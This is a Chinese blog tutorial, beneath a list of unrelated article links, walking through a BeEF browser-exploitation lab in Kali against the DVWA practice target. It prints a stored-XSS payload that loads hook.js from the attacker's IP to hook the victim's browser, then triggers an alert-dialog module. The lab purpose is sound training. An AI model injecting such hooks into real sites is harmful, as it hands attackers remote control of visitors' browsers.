- 1细粒度图像分类论文研读-2022_图像分类最新论文
- 2Git ---- push时遇到大文件如何解决?_git push 大文件
- 3Appium----基于Ubuntu系统借助Genymotion模拟器创建一个终端设备_ubuntu genymotion
- 4IDEA上传项目到Gitee仓库(清晰、明确、具体)
- 5从github下载项目并进行环境配置_从github下载的代码如何配置环境
- 6常见的6种软件测试用例设计方法_软件测试常用的用例设计方法
- 7guthub第一次作业连接及心得体会
- 8PyTorch中文版官方教程来啦(附下载)
- 9原码、反码、补码的互相转换_浮点数原码反码补码转换
- 10GitHub客户端操作3--pull Request(拉请求)_github compare and pull request
Kali中Beef的使用教程_kali beef
赞
踩
项目场景:
Kali中Beef的使用教程
情景复现:
实验环境:Kali-Debian 6 64位、Windows10
| 环境 | 版本 |
|---|---|
| kali | Debain6 64位 |
| windows | Win10 64位 |
| 靶场 | DVWA |
实验过程:
以下实验是利用Kali自带的Beef来进行的(不同Linux版本可能会出现一些差异)
1、打开kali终端,键入beef-xss(确保你的kali是可以上网的,本人的kali出现一些问题,没有网络)
2、进入/usr/share/beef-xss下(可以手动敲命令,也可以在kali计算机下找到这个目录),终端进入输入命令./beef(注意这个点)
3、查看kali的IP信息等(红线框里面的)
4、稍等一下kali自带浏览器会打开Beef登录窗口
5、弹窗登录,账号:beef,密码:beef
6、登录win10下DVWA靶场(前提是在PHP小皮工具根目录下有DVWA-master,没有的请自行上网下载、配置等)
7、网上有很多说法是Beef需要靶机的浏览器是IE8以下,所以现在把靶场的级别调至Low等级(看红框位置)
8、在XSS(Stored)下输入脚本命令
Name:ceshi(自己取一个名字)
Message:<script src="http://192.xxx.xxx.xxx(自己的kaliIP地址):3000/hook.js"></script>(可复制)
10、这里的文本框初始的时候有字数限制,我们需要进行修改,网上有直接F12进行修改的,这里采用找到登录页面index.php文件修改,Name文本修改成100字符,Message修改成500字符(这样就足够复制命令了)
11、点击Sign Guestbook,kali那边Beef就勾上了靶机所在的浏览器了
12、打开kali,依次点击
13、简单介绍弹窗攻击:Create Alert Dialog,在该模块下输入一些信息,执行后,靶场所在浏览器会出现弹窗。
14、至此,恭喜你完成了该模块的学习(Beef里面的模块还有很多,值得大家去官网以及其他博主等那里好好看看)
心得体会:
漏洞复现需要耐心,遇到问题需要不停的查阅网络资料!持之以恒的做,相信自己,也相信看文章的你一定会有所收获!
